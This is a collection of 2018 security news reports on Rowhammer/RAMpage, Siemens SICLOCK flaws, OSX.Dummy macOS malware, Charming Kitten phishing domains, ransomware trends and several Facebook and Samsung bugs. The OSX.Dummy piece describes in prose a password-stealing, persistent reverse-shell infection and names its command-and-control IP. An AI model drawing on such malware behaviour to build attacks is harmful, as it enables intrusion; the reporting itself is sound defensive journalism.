The problem results from memory chips that leverage very small internal data paths to maximize “speed.” We may want to ensure that computer memory is free from corruption and consistent, the physics involved at the tiny memory scale have unintended consequences.

As written in the original academic paper, “[…] as DRAM process technology scales down to smaller dimensions, it becomes more difficult to prevent DRAM cells from electrically interacting with each other. […] By reading from the same row in DRAM, we show that it is possible to corrupt data in nearby addresses.” Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors, (Yoongu Kim, Ross Daly, Jeremie Kim, Chris Fallin, Ji Hye Lee, Donghyuk Lee, Chris Wilkerson, Konrad Lai, Onur Mutlu.) In other words, by repeatedly and quickly reading memory contents in DRAM Row 2, it may be possible to cause individual bits in Rows 1 or 3 to change from a 1 to a 0 or vice versa.

An interesting physical outcome and concerning, but it wasn’t until Google Zero Project researchers published a working exploit in 2015 that the risks became significant.

RAMpage_Android_Rowhammer

In the 2015 blog post, “Exploiting the DRAM rowhammer bug to gain kernel privileges”, Google security researchers explained that by using the rowhammer technique on two rows simultaneously (double-sided hammering), they were able to induce bit flips on a DRAM memory location between the two rows being read. Corrupting memory with electrical interference is a neat trick, but being able to change the memory bits to your choice is the start of a practical exploit and the researchers demonstrated an ability to gain privilege escalation on Windows and Linux systems. With privilege escalation, it may be possible to execute any malicious code on the target system. There are mitigations available to reduce the risks from rowhammer, but they require changes to hardware and some result in increased power consumption and reduced performance. Perhaps acceptable in desktop and server environments where security concerns override power consumption, but power is a prime concern in mobile devices — which were first shown to be vulnerable to rowhammer attacks in 2016.

Security researchers from VUSec in Amsterdam published a blog posti n 2016 titled, “Drammer: Flip Feng Shui Goes Mobile.” In this post, they described how a rowhammer attack could be used against mobile devices running Android OS to gain “root access” to the devices. The attack can be launched “by hiding it in a malicious app that requires no permissions.” Once the attacker has root access, they have full control of your mobile device and the information on that device. A patch for the Android kernel ION subsystem was released in November of 2016 which addresses the Drammer attack. Unfortunately, the Android environments still suffer from fragmentation and distribution challenges so you can expect that many vulnerable devices have not yet received this patch. Of course, as we learned this week, even if you did receive the patch, you may still be vulnerable.

An international team of system security researchers published the paper, “GuardION: Practical Mitigation of DMA-based Rowhammer Attacks on ARM” which describes an evolution of the rowhammer attack into the attack they dub, RAMPAGE. From the paper, RAMPAGE is described as, “a set of DMA-based Rowhammer attacks
against the latest Android OS, consisting of (1) a root exploit, and (2) a series of app-to-app exploit scenarios that bypass all defenses.” Acknowledging that the patch released in 2016 did address the “double-sided hammer” vulnerability, these researchers determined that combining an attack that consumes all ION internal memory pools with their Flip Feng Shui exploit they were still able to gain root on the target Android device. As always, once the bad actors have root, they have access to everything on your phone.

Since the theoretical proposal in 2012, we have seen the same memory vulnerability exploited repeatedly with greater impact and relative ease. In the RAMpage researchers’ own words, “Over the last two years, the Rowhammer bug transformed from a hard-to-exploit DRAM disturbance error into a fully weaponized attack vector.” Being hardware-based, memory attacks like these are notoriously difficult to defend against. And if there is a viable defence, it usually increases costs or reduces performance making it less likely to be deployed We have to recognize that mobile devices are as capable as desktop computers and accept that they require similar protections, vulnerability management procedures and upgrades.

Do you consider your ability to patch and protect mobile systems when purchasing?


Siemens warns of several flaws affecting Central Plant Clocks
4.7.2018 securityaffairs ICS

Siemens disclosed several vulnerabilities in some of its SICLOCK central plant clocks, including ones that have been rated as “critical.”
Siemens is warning of the presence of six vulnerabilities in some of its SICLOCK central plant clocks that used to synchronize time in industrial environments.

“In the event of failure or loss of reception from the primary time source, the central plant clock ensures stable continuation of the clock time, and tracking of the system time without time jumps as soon as reception is restored.” reads the Siemens official website.

The vulnerabilities have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856, three of them have been classified as critical.

“SICLOCK TC devices are affected by multiple vulnerabilities that could allow an attacker to cause Denial-of-Service conditions, bypass the authentication, and modify the firmware of the device or the administrative client.” reads the security advisory.

One of the critical vulnerabilities tracked as CVE-2018-4851 could be exploited by attackers with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition and potentially reboot by sending it specially crafted packets.

The successful exploitation of this flaw doesn’t require user interaction.

“An attacker with network access to the device, could cause a Denial-of-Service condition by sending certain packets to the device, causing potential reboots of the device.” reads the security advisory.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed. The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

The second critical vulnerability, tracked as CVE-2018-4853, can be exploited by an attacker with access to UDP port 69 to modify the firmware on a vulnerable device.

The flaw could be exploited by an attacker to run his own code on the SICLOCK device.

Siemens Central Plant Clocks siclock

The third critical issue tracked as CVE-2018-4854 can be exploited by an attacker with access to UDP port 69 to modify the administrative client stored on the device.

“An attacker with network access to port 69/udp could modify the administrative client stored on the device.” continues the advisory.

“If a legitimate user downloads and executes the modified client from the affected device, then he could obtain code execution on the client system.”

Siemens also reported a high severity vulnerability that could be exploited by a network attacker to bypass authentication.

The other issues discovered by Siemens are a medium severity flaw that could be exploited to launch a man-in-the-middle (MitM) attack and intercept unencrypted passwords stored in client configuration files, and a low severity flaw that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The flaws impacted the SICLOCK TC100 and SICLOCK TC400.

Siemens did not release firmware updates for the products because they are in phase out, the industrial giant only provided workarounds and mitigations to mitigate the risk of attacks.


Huawei enterprise and broadcast products have a crypto bug. Fix it now!
4.7.2018 securityaffairs
Vulnerebility

Huawei has rolled out security fixes for some enterprise and broadcast products to address a cryptography issue tracked as CVE-2017-17174.
Huawei has released security updates for some enterprise and broadcast products to address a cryptography issue that was discovered in late 2017.

The vulnerability, tracked as CVE-2017-17174, is related to the implementation of an insecure encryption algorithm and could be exploited to power MiTM attack to decrypt a session key and recover the content of the entire session.

“There is a weak algorithm vulnerability in some Huawei products. A remote, unauthenticated attacker may capture traffic between clients and the affected products.” reads the security advisory published by Huawei.

“Due to the use of insecure encryption algorithm, the attacker may decrypt the session key by some cryptanalytic operations and the traffic between the server and the client. Successful exploit may cause information leak.”

The following Huawei products using RSA encryption in TLS are potentially vulnerable:

The RSE6500 Recording and Streaming Engine version V500R002C00. A high-performance, full-HD recording and streaming engine that supports live video multicast and mobile Video on Demand (VoD).
The SoftCo unified communications software version V200R003C20SPCb00;
The VP9660 video conferencing multipoint control units version V600R006C10;
Multiple versions of its eSpace U1981 IP telephony and enterprise communications universal SIP gateway.
Huawei

Huawei rated the vulnerability as a 5.3 (medium) because it is not easy to exploit, the company has released software updates to address the flaw for all of its solution except for the unified communications software SoftCo that has been deprecated.

Every flaw discovered in products of Chinese and Russia firm trigger the alarm of governments that are already banning their solution from critical infrastructure and government offices.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.


Ransomware and malicious crypto miners in 2016-2018
4.7.2018 Kaspersky
Ransomware
KSN Report: Ransomware and malicious cryptominers 2016-2018

Ransomware is not an unfamiliar threat. For the last few years it has been affecting the world of cybersecurity, infecting and blocking access to various devices or files and requiring users to pay a ransom (usually in Bitcoins or another widely used e-currency), if they want to regain access to their files and devices.

The term ransomware covers two main types of malware: so-called window blockers (which block the OS or browser with a pop-up window) and cryptors (which encrypt the user’s data). The term also encompasses select groups of Trojan-downloaders, namely those that tend to download encryption ransomware once a PC is infected.

Kaspersky Lab has a tradition of reporting on the evolution of ransomware – and you can find previous reports on the threat here and here.

This year, however, we came across a huge obstacle in continuing this tradition. We have found that ransomware is rapidly vanishing, and that cryptocurrency mining is starting to take its place.

The architecture of cryptocurrencies assumes that, in addition to purchasing cryptocurrency, a user can create a new currency unit (or coin) by harnessing the computational power of machines that have specialized ‘mining’ software installed on them.

Cryptocurrency mining is the process of creating these coins – it happens when various cryptocurrency transactions are verified and added to the digital blockchain ledger. The blockchain, in its turn, is a chain of successive blocks holding recorded transactions such as who has transferred bitcoins, how many, and to whom. All participants in the cryptocurrency network store the entire chain of blocks with details of all of the transactions that have ever been made, and participants continuously add new blocks to the end of the chain.

Those who add new blocks are called miners, and in the Bitcoin world, as a reward for each new block, its creator currently receives 12.5 Bitcoins. That’s approximately $30,000 according to the exchange rate on July 1, 2017. You can find out more about the mining process here.

Given the above, this report will examine what is hopefully ransomware’s last breath, in detail, along with the rise of mining. The report covers the period April 2017 to March 2018, and compares it with April 2016 – March 2017.

Main findings
The total number of users who encountered ransomware fell by almost 30%, from 2,581,026 in 2016-2017 to 1,811,937 in 2017-2018;
The proportion of users who encountered ransomware at least once out of the total number of users who encountered malware fell by around 1 percentage point, from 3.88% in 2016-2017 to 2.80% in 2017-2018;
Among those who encountered ransomware, the proportion who encountered cryptors fell by around 3 percentage points, from 44.6% in 2016-2017 to 41.5% in 2017-2018;
The number of users attacked with cryptors almost halved, from 1,152,299 in 2016-2017 to 751,606 in 2017-2018;
The number of users attacked with mobile ransomware fell by 22.5% from 130,232 in 2016-2017 to 100,868 in 2017-2018;
The total number of users who encountered miners rose by almost 44.5% from 1,899,236 in 2016-2017 to 2,735,611 in 2017-2018;
The share of miners detected, from the overall number of threats detected, also grew from almost 3% in 2016-2017 to over 4% in 2017-2018;
The share of miners detected, from overall risk tool detections, is also on the rise – from over 5% in 2016-2017 to almost 8% in 2017-2018;
The total number of users who encountered mobile miners also increased – but at a steadier pace, growing by 9.5% from 4,505 in 2016-2017 to 4,931 in 2017-2018.


Israel Accuses Hamas of Targeting Soldiers With World Cup App
4.7.2018 securityweek BigBrothers

Tel Aviv - Israeli military intelligence on Tuesday accused Hamas hackers of creating a World Cup app and two online dating sites to tempt soldiers into downloading spyware onto their phones.

Briefing journalists at national defence headquarters in Tel Aviv, army intelligence officers said the scam by members of the Palestinian Islamist movement that runs the Gaza Strip failed to damage military security.

"No damage was done, as we stopped it in time," one of the officers said, with the military's response codenamed "Operation Broken Heart".

But he said the attempt showed the Islamist militants had adopted new tactics since a similar attempt was revealed in January 2017.

The emphasis then was solely on the dating game, with the hackers posing online as attractive young women seeking to lure men in uniform into long chats.

This time the traps were aimed at both sexes and there was the additional bait of World Cup action with an app offering "HD live streaming of games, summaries and live updates".

Attackers used stolen identities to create more convincing fake Facebook profiles of young Israelis, written in fluent Hebrew studded with current slang.

"What Hamas is bringing to the table is a very good knowledge of our young people and their state of mind," another officer said. Asked how he could be sure Hamas was behind the online offensive, he declined to say but insisted there was no doubt.

The assailants uploaded their custom-built Golden Cup, Wink Chat and Glance Love applications to the Google Store, to make them seem legitimate, according to the officers.

Using Facebook sharing and Whatsapp messages, they urged young men and women performing Israel's compulsory military service to download the infected apps.

Once on the recipient's phone, officers said, the device could be taken over to covertly take and send photographs, eavesdrop on conversations, copy stored files and pictures and transmit location details.

But in most cases, they said, soldiers did not download the apps and informed their superiors of their suspicions.

Google has since deleted the apps from its store, they added.

They said that awareness of the potential risk had soared since the army publicised the previous attempts.

"Thanks to the soldiers' vigilance, Hamas' intelligence infrastructure was exposed before it caused actual security damage," army briefing notes said. Israel and Palestinian militants in Gaza have fought three wars since 2008.

In March 2016 a Palestinian from Gaza was charged with hacking into Israeli military drones.


New macOS Malware Targets Crypto-Currency Users
4.7.2018 securityweek Apple

A new piece of macOS malware has been observed being distributed via crypto-currency related Slack or Discord chat groups, security researchers warn.

First detailed late last month, the malware is being distributed by malicious actors who impersonate admins or key people. The actors share small snippets of code with the members of said chat groups, and attempt to convince them into running the code in a terminal.

Upon execution of the code, a malicious binary is downloaded and executed onto the victim’s machine. Although the social engineering trick isn’t as sophisticated, some users apparently fall for it.

The downloaded payload is rather large, at 34MB. As of Friday, the malware wasn’t being detected by any of the 60 anti-virus engines in VirusTotal, Remco Verhoef, ISC Handler and Founder of DutchSec, explains.

The malicious binary is not signed and Gatekeeper would normally flag and block it, but it appears that Apple’s protection measure does not work for files that are executed directly via terminal commands.

The reason the binary is so large is that the author apparently packed in it libraries such as OpenSSL and V8, Objective-See’s Patrick Wardle, who named the malware OSX.Dummy, points out.

When executed on the target machine, the malware first sets the script to be owned as root. When the threat executes sudo to change the file’s permissions, the user is prompted to enter their password in the terminal, and the malware steals it and saves it to /tmp/dumpdummy.

Next, OSX.Dummy sets the script to be executable via chmod +x, moves the script to a new directory, dumps a plist file to /tmp/com.startup.plist and then moves it to the LaunchDaemons directory, sets the owner of the file to root, and then launches the plist launch daemon, for persistency.

At this point, the malware has ensured that the malicious script is automatically executed by the OS whenever the system is rebooted.

The Python script, the security researchers discovered, attempts to connect to 185.243.115[.]230 on port 1337, then “duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell,” Wardle notes.

Once the connection to the remote command and control (C&C) server is established, the attacker can execute arbitrary commands on the infected machine, as root.

The malware’s capabilities, however, are limited, and every step of the infection process is rather trivial to detect, Wardle says.


Flaws Expose Siemens Central Plant Clocks to Attacks
4.7.2018 securityweek
Vulnerebility

Siemens informed customers on Tuesday that some of its SICLOCK central plant clocks are affected by several vulnerabilities, including ones that have been rated “critical.”

Siemens SICLOCK devices are used to synchronize time in industrial plants. The central plant clock ensures stability in case of a failure or loss of reception at the primary time source.

According to the German industrial giant, SICLOCK systems are affected by a total of six vulnerabilities. The security holes have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856.

Siemens SICLOCK vulnerabilities

Three of the flaws have been classified as critical. One of them allows an attacker with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition – and possibly reboot – by sending it specially crafted packets.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed,” Siemens wrote in its advisory. “The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

Another critical vulnerability can be exploited by an attacker with access to UDP port 69 to modify the firmware on a targeted SICLOCK device. Access to the same port is also required for the exploitation of a different critical flaw that allows an attacker to modify the administrative client stored on the device and execute arbitrary code.

A high severity flaw disclosed by Siemens can allow a network attacker to bypass authentication, but exploitation requires the hacker to obtain specific information about the targeted device.

Siemens SICLOCK vulnerabilities

The remaining security holes are a medium severity issue that allows a man-in-the-middle (MitM) attacker to intercept unencrypted passwords stored in client configuration files, and a low severity bug that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Four of the six vulnerabilities can be exploited without any user interaction. Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The impacted products are SICLOCK TC100, which is designed for smaller plants, and SICLOCK TC400. Since both products are in the process of being phased out, Siemens has not released any firmware updates, and instead advised customers to apply a series of workarounds and mitigations that should reduce the risk of attacks.

Mitigations include the installation of redundant time sources and implementation of plausibility checks for critical controllers in the plant, and protecting network access to impacted devices.


Iranian Hackers Impersonate Israeli Security Firm
4.7.2018 securityweek BigBrothers

A group of Iranian hackers focused on cyber-espionage recently built up a website to impersonate ClearSky Cyber Security, the Israeli firm that exposed their activities not long ago.

The hackers, tracked as APT35 and also known as NewsBeef, Newscaster, and Charming Kitten, have been active since at least 2011, with their activities detailed for the first time several years ago.

In December 2017, ClearSky Cyber Security published a report detailing the group’s activities during the 2016-2017 timeframe. The security firm not only described the actor’s infrastructure, but also provided information on DownPaper, a new piece of malware the hackers had been using.

The security firm exposed the link between the group and Behzad Mesri, also known as Skote Vahshat, who was charged in November 2017 with the hacking of HBO. Furthermore, the researchers also managed to establish the identity of two other alleged members of the group.

Roughly half a year after the report was published, the security firm announced on its Twitter account that the hackers built their own site impersonating ClearSky.

“#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com),” the security firm announced.

The advanced persistent threat (APT) apparently copied entire pages from the legitimate website, but also changed one of them to include a sign in option with multiple services. Anyone entering credentials there would have had them sent to the actor instead.

“These sign in options are all phishing pages that would send the victim's credentials to the attackers. Our legitimate website does not have any sign in option. It seems that the impersonating website is still being built because some of the pages have error messages in them,” the security firm announced.

One of the pages on the fake website, the security researchers discovered, featured content related to a Charming Kitten campaign that ClearSky exposed only several weeks ago. That page, however, wasn’t customized to look like the security firm’s website.

The fake website started being flagged as deceptive soon after ClearSky discovered it. The security firm says that its employees, services, and customers were not affected.

Over the past years, security researchers managed to link various hacking groups to Iran, including APT33, Rocket Kitten, Magic Hound, and CopyKittens, and even revealed that they tend to share infrastructure and malware code.


Data Security Startup Enveil Unveils Homomorphic Encryption Platform
4.7.2018 securityweek Krypto

Enveil's New "ZeroReveal" Platform Enables Homomorphic Encryption to Secure Data in Use

Sensitive data exposure is classified by OWASP as the third most critical web application vulnerability. Encryption is the primary solution. But encryption is only generally available for data at rest and data in transit -- leaving the third state of data (data in use) potentially exposed. Bank card details, for example, can be stored encrypted and can be transmitted encrypted -- but they currently must be decrypted and exposed at the point of processing.

Finding some way for data to remain encrypted and secure even during processing is considered the holy grail of encryption. One method, homomorphic encryption, was first mooted in 1978; but initially without any clear proof that it was possible. Today, start-up firm Enveil has launched the first practical and scalable commercial homomorphic encryption platform, ZeroReveal.

EnveilThe core technology originates from within the NSA. Enveil's CEO and founder, mathematician Ellison Anne Williams, worked on the project within the NSA as a senior researcher for 12 years. When she left in 2015 she took the technology with her, exclusively, and founded Enveil in 2016. Since then, Enveil has expanded and matured the core technology to the point of launching a commercial product.

"Continued reports of chip flaws [eg, Spectre and Meltdown] and data breaches in recent months make it clear that encrypting data at rest and in transit isn't good enough in today's volatile security environment. Organizations must eliminate the data in use security gap and do so in a way that won't negate investments in existing systems and protocols," explains Williams. "We allow you to securely use data where it is and as it is today, delivering nation-state level security -- no system overhaul required."

When people use data, it is typically undertaken by running a search or analytic over the data. Enveil concentrates on the security posture of that search or analytic as it is being performed.

"We have two-party form factor," Williams told SecurityWeek. "From a technology standpoint, it means that we can take a search or analytic that folks will want to perform over data, and we can encrypt that, and then we can run that encrypted search over massive amounts of data anywhere, without ever decrypting anything. We never decrypt the search itself, and if the underlying data also happens to be encrypted, we don't have to decrypt that either. We accomplish this through the ZeroReveal Compute Fabric where we can encrypt the search, send that out to the data location, and that can be processed there without ever being decrypted."

This is made possible by the magic math known as homomorphic encryption. "It's been around for a while," continued Williams, "and a lot of work has gone into it. It allows you to perform operations on encrypted data as if it were unencrypted data. This is powered by the mathematical nature of homomorphic encryption. Until now it has remained computationally intensive and not practical. Our major breakthrough has been moving this holy grail from the realm of the theoretical to the realm of the practical."

ZeroReveal solves very specific use cases. "How do I go and encrypt my most sensitive data and put it securely in the cloud," said Williams, "but yet still be able to process it in its encrypted state in the cloud platform? It has become practical because of advances in the way that we use the homomorphic encryption rather than simply massive increases in compute power."

One of ZeroReveal's great strengths is that it works on existing encrypted data -- the secret resides in the homomorphically encrypted search or analytic. "We sit above the storage technology," she said. "People don't have to change the mechanism of storage or how they currently encrypt their data. This is what is new. In traditional homomorphic systems, you must have the data itself encrypted homomorphically to operate on it. We don't do that at all. It's because we're looking for bit matches rather than character matches in the underlying data. It allows us to search across any data store, encrypted or unencrypted, and encrypted with any crypto and even graphics -- it's all represented by the bit values that we search on."

The use cases are already extensive, and will only grow with the increase of big data aggregators. Consider, for example, a third-party aggregation of financial data. The very act of searching that data for specific information can highlight confidential considerations of potential M&A activity. But with the search encrypted (irrespective of whether or how the big data itself is encrypted), no outside party will know what the query was.

It would allow health organizations to anonymize and encrypt personal health data, and allow researchers to analyze the data without it ever having to be decrypted. It would allow staff to work on sensitive data from home -- or anywhere -- over the weekend without having to decrypt and copy the data to a laptop. And it clearly has huge potential to protect both data owners and data processors concerned about GDPR.

"The range of potential use cases for homomorphic encryption is vast," says Garrett Bekker, principal analyst, Information Security at 451 Research. "By focusing on the encryption-in-use space, Enveil complements data-at-rest and data-in-motion encryption to fill a gap in the overall data security landscape."

Fulton, Maryland-based Enveil was founded in 2016 by Ellison Anne Williams. It raised $4 million from investors including Bloomberg, Thomson Reuters, USAA, In-Q-Tel and DataTribe. The firm focuses solely on securing data in use, and works seamlessly with existing investments in securing data at rest and data in transit.


Iranian Charming Kitten ATP group poses as Israeli cybersecurity firm in phishing campaign
3.7.2018 securityaffairs APT

Iranian APT groups continue to very active, recently Charming Kitten cyber spies attempted to pose as an Israeli cyber-security firm that uncovered previous hacking campaigns.
The Iranian Charming Kitten ATP group, aka Newscaster or Newsbeef, launched spear phishing attacks against people interested in reading reports about it.

The Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Iranian Hackers used a network of fake accounts (NEWSCASTER network) on principal social media to spy on US officials and political staff worldwide, this is reported in an analysis done by iSIGHTPartners. The Charming Kitten group is also known for the abuse of Open Source Security Tools, including the BeEF.

The threat actor targeted numerous entities in Iran, the U.S., Israel, the U.K. and other countries. The hackers also hit individuals involved in academic research, human rights, and the media.

ClearSky detailed the group’s activities during 2016-2017, the report includes information related to the infrastructure used by the APT and to a new strain of malware dubbed DownPaper.

The report also linked the hacker behind the HBO security breach to the Charming Kitten, and reveals the identities of two other alleged members of the group.

Recently the experts from the Israeli cyber-security firm ClearSky Security, discovered that Charming Kitten APT creates a rogue copy (clearskysecurity.net ) of the official website of the company (clearskysec.com).

Charming Kitten

“Charming Kitten built a phishing website impersonating our company,” stats ClearkSky. “They copied pages from our public website and changed one of them to include a ‘sign in’ option with multiple services.”

“These sign-in options are all phishing pages that would send the victim’s credentials to the attackers,” ClearSky said. “Our legitimate website does not have any sign in option.”

ClearSky Cyber Security
@ClearskySec
#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com ). They copied pages from our public website and changed one of them to include a "sign in" option with multiple services.

4:15 PM - Jul 1, 2018
103
106 people are talking about this
Twitter Ads info and privacy
The experts believe they have discovered the rogue website while the Iranian APT was still working on it.

“It seems that the impersonating website is still being built because some of the pages have error messages in them,” ClearSky added.

The experts discovered that the fake clearskysecurity.net domain was hosted on a server that was associated with the Charming Kitten APT by ClearSky last month.

View image on TwitterView image on TwitterView image on TwitterView image on Twitter

ClearSky Cyber Security
@ClearskySec
Potentially #CharmingKitten put BeEF in The Jewish Journal, and set up fake domains of Deutsche Welle (Germany's public international broadcaster) and Frost&Sullivan:

jewishjournal\.us
deutcshewelle\.org
deutcshewelle\.com
frostsullivan\.org

More:https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.q59o3v69qjhh …

9:57 AM - Jun 12, 2018
29
30 people are talking about this
Twitter Ads info and privacy
The server was still hosting content from previous campaigns, a further clue that link it to the Iranian hacker group.

The website appears still under development, it is likely it was not yet involved in any hacking campaign.

As the website was not finished, ClearSky doesn’t believe the Iranian hackers managed to phish anyone yet. The website was taken down after a few hours of its discovery.

Iranian hackers are becoming even more aggressive even if experts believe that they are not particularly sophisticated.

Recently we discussed the OilRig gang has been using a new Trojan in attacks aimed at targets in the Middle East.

OilRig is just one of the Iran-linked hacker crews, other groups tracked by security experts are APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


The Social network giant Facebook confirms it shared data with 61 tech firms after 2015
3.7.2018 securityaffairs
Social

On Friday, Facebook provided a 748-page long report to Congress that confirms the social network shared data with at least 61 tech firms after 2015.
This is the worst period in the history of the social network, now Facebook admitted to having shared users’ data with 61 tech firms.

The problem is that Facebook allowed tech companies and app developers to access its users’ data after announcing it had restricted third-party firms to access its data in 2015.

Immediately after the Cambridge Analytica privacy scandal that affected 87 million users, Facebook attempted to mitigate the pressure of the media by confirming that it already restricted third-party access to its users’ data since May 2015.

On Friday, Facebook provided a 748-page long report to Congress that confirms the practice of sharing data with 61 tech firms after 2015.

The company also granted a “one-time” six-month extension to the companies to come into compliance with Facebook’s new privacy policy.

“In April 2014, we announced that we would more tightly restrict our platform APIs to
prevent abuse. At that time, we made clear that existing apps would have a year to transition—at which point they would be forced (1) to migrate to the more restricted API and (2) be subject to Facebook’s new review and approval protocols.” reads the report.

“The vast majority of companies were required to make the changes by May 2015; a small number of companies (fewer than 100) were given a one-time extension of less than six months beyond May 2015 to come into compliance.”

In addition, the company admitted that a very small number of companies (fewer than 10) have had access to limited friends’ data as a result of API access that they
received in the context of a beta test.

The social media firm also shared a list containing 52 companies that it has authorized to build versions of Facebook or Facebook features for their devices and products.

The list includes Acer, Amazon, Apple, Blackberry, Microsoft, Motorola/Lenovo, Samsung, Sony, Spotify, and the Chinese companies Huawei and Alibaba.

“The partnerships—which we call “integration partnerships”—began before iOS and
Android had become the predominant ways people around the world accessed the internet on their mobile phones. ” explained Facebook.

“We engaged companies to build integrations for a variety of devices, operating systems, and other products where we and our partners wanted to offer people a way to receive Facebook or Facebook experiences,” the document reads. “These integrations were built by our partners, for our users, but approved by Facebook.”

The social network firm confirmed it has already interrupted 38 of these 52 partnerships and additional seven will be discontinued by the end of July, and another one by the end of this October. The company will continue the partnership with Tobii, an accessibility app that enables people with ALS to access Facebook, Amazon, Apple, Mozilla, Alibaba and Opera.

“Three partnerships will continue: (1) Tobii, an accessibility app that enables people with ALS to access Facebook; (2) Amazon; and (3) Apple, with whom we have agreements that extend beyond October 2018. We also will continue partnerships with Mozilla, Alibaba and Opera— which enable people to receive notifications about Facebook in their web browsers—but their integrations will not have access to friends’ data.” added the company.

Privacy advocated and security experts defined as questionable the way the social network managed users’ data, especially after 2015.

Just a few days ago, I reported the news that a popular third-party quiz app named NameTests was found exposing data of up to 120 million Facebook users.


Facebook is notifying 800,000 users affected by a blocking bug
3.7.2018 securityaffairs
Social

Yesterday the social network giant Facebook started notifying 800,000 users affected by a blocking bug. The company has already fixed it.
When a Facebook user blocks someone, the blocked user will be not able to interact with him, this means that he will not see his posts, it will not able to start conversations on Messenger or add him as a friend. The blocked user may have also been able to contact the blocker via Messenger.

Facebook discovered a bug affecting its platform that allowed blocked users to interact with the accounts that decided to block them. As result, blocked users were able to see some of the content posted by individuals who had blocked them.

The issue was introduced on May 29, and the social network giant addressed it on June 5.

“Starting today we are notifying over 800,000 users about a bug in Facebook and Messenger that unblocked some people they had blocked. The bug was active between May 29 and June 5 — and while someone who was unblocked could not see content shared with friends, they could have seen things posted to a wider audience. For example pictures shared with friends of friends. ” wrote Facebook Chief Privacy Officer Erin Egan.

According to Egan, one a user has been blocked will not see content shared only with friends, but he may have been shown content shared with “friends of friends.

Egan clarified that blocking also automatically unfriends users if they were previously friends.

Below the details shared by Egan on this specific bug.

It did not reinstate any friend connections that had been severed;
83% of people affected by the bug had only one person they had blocked temporarily unblocked; and
Someone who was unblocked might have been able to contact people on Messenger who had blocked them.
Facebook has fixed the bug and everyone has been blocked again, the company is sending a notification t the affected accounts encouraging them to check their blocked list.

Facebook bug


A Samsung Texting App bug is sending random photos to contacts
3.7.2018 securityaffairs Mobil

Some Samsung devices are randomly sending photos taken with the camera to contacts in the address book without permission.
Do you have a Samsung smartphone? There is something you need to know.

Some devices are randomly sending photos taken with the camera to contacts in the address book without permission.

The problem affected Galaxy S9 and S9+ devices, but we cannot exclude that other devices may have been affected.

The news was first reported by Gizmodo, several users reported the anomalous behavior on Reddit and the company official forums.

“Sending pictures to others is one of the most basic functions of a smartphone, but when your phone’s texting app starts randomly pushing out photos without your knowledge, you got a problem..” reported Gizmodo

“And unfortunately, according to a smattering of complaints on Reddit and the official Samsung forums, it seems that’s exactly what happened to a handful of Samsung phone users, including owners of late model devices such as the Galaxy Note 8 and Galaxy S9.”

One user explained that his phone sent all his photos to his girlfriend over the night, but there was no record of it on his messages app. The expert discovered that there was a record of this activity on the mobile logs.

“Last night around 2:30 am, my phone sent her my entire photo gallery over text but there was no record of it on my messages app. However, there was record of it on tmobile logs. Why would this happen?” wrote the user on Reddit.

The unwanted messages were sent out via the Samsung Messages app, some users discovered the issue after they received a response from the recipients that received the photos.

A Samsung confirmed it is aware of the reports” and that its technical staff is investigating the problem.

samsung s9

Below the list of problems observed since the RCS Messaging was enabled and occurs with the SCHEDULED TEXT feature.

Scheduled Messages are sent prematurely
Scheduled text Messages end up in WRONG threads
Messaging incorrectly displays scheduled messages as “sent” when, in fact, the other party has not received them.
Clearly many users are speculating this glitch was introduced with the push of RCS messaging updates by telco carriers.

As a temporary measure, Samsung owners can revoke Samsung Message’s permissions to access storage (Settings -> Apps -> Samsung Messages -> Permissions -> Storage).

Concerned customers are encouraged to contact us directly at 1-800-SAMSUNG


Mozilla Announces Root Store Policy Update
3.7.2018 securityweek  Security

Mozilla announced on Monday that its Root Store Policy for Certificate Authorities (CAs) has been updated to version 2.6.

The Root Store Policy governs CAs trusted by Firefox, Thunderbird and other Mozilla-related software. The latest version of the policy, discussed by the Mozilla community over a period of several months, went into effect on July 1.

The new Root Store Policy includes nearly two dozen changes and some of the more important ones have been summarized in a blog post by Wayne Thayer, CA Program Manager at Mozilla.

Version 2.6 of the Root Store Policy requires CAs to clearly disclose email address validation methods in their certificate policy (CP) and certification practice statement (CPS). The CP/CPS must also clearly specify IP address validation methods, which have now been banned in specific circumstances.

CAs need to periodically obtain certain audits for their root and intermediate certificates in order to remain in the root store. Mozilla now requires auditors to provide reports written in English.

The new policy also states that starting with January 1, 2019, CAs will be required to create separate intermediate certificates for S/MIME and SSL certificates.

“Newly issued Intermediate certificates will need to be restricted with an EKU extension that doesn’t contain anyPolicy, or both serverAuth and emailProtection. Intermediate certificates issued prior to 2019 that do not comply with this requirement may continue to be used to issue new end-entity certificates,” Thayer explained.

Another new requirement is that root certificates must have complied with the Mozilla Root Store Policy from the moment they were created.

“This effectively means that roots in existence prior to 2014 that did not receive BR audits after 2013 are not eligible for inclusion in Mozilla’s program. Roots with documented BR violations may also be excluded from Mozilla’s root store under this policy,” Thayer said.

Mozilla takes digital certificate management very seriously. Last year it announced taking action against Chinese certificate authority WoSign and its subsidiary StartCom as a result of over a dozen incidents. It also targeted Symantec after the company and its partners were involved in several incidents involving mississued TLS certificates, and later raised concerns over DigiCert’s acquisition of Symantec’s CA business.


Facebook Notifies 800,000 Users of Blocking Bug
